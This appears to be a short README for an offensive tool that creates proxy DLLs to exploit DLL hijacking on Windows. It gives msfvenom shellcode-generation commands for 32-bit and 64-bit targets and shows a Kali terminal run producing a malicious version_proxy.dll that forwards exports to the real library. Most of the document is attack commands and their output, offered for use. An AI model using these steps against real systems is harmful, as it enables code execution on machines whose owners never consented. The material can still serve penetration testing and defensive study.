Tool for creating forwarding dll for exploiting dll hijacking vulnerability.
- Mingw-64 installed.
- python2.
- PEfiles lib.
-
Create shellcode with msfvenom and replace with template file with
YOUR SHELLCODE
msfvenom -p windows/x64/exec cmd=cmd.exe -f c -b "\x00" //FOR 64bit msfvenom -p windows/exec cmd=cmd.exe -f c -b "\x00" //FOR 32bit
-
Run script.
kali@kali:~/Music/hijack/proxyjacker$ python proxydllhijacker.py Proxy DLL Creator For DLL HIjacking By Rikunj Sindhwad [Mr.R0b07] Usage: proxydllhijacker.py 'DLL File Location' 'location for real path where real dll is '[optional] Usage: proxydllhijacker.py '/home/kali/xyz/abc.dll' 'c:/program files/blabla/abc.dll' kali@kali:~/Music/hijack/proxyjacker$ python proxydllhijacker.py version.dll 'C:/Program Files (x86)/Testingapp/' Proxy DLL Creator For DLL HIjacking By Rikunj Sindhwad [Mr.R0b07] [*] DLL is 32bit [*] Defination File Created with name of export.def [*] Created 32bit DLL : version_proxy.dll kali@kali:~/Music/hijack/proxyjacker$
-
Initial
-
Added Custom Path to redirect
For Upgrade Request Use telegram to connect me on telegram https://t.me/R0B077